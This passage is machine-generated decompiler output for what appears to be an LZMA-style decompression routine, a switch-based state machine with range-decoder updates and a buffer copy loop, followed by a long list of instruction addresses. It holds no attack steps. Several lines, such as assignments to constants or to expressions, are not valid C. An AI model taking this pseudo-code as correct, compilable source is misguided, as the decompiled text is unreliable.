													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf6
                                                              0x00406bfc
                                                              0x00406c0e
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406bca
                                                              0x00406bd0
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00406f91
                                                              0x00406f91
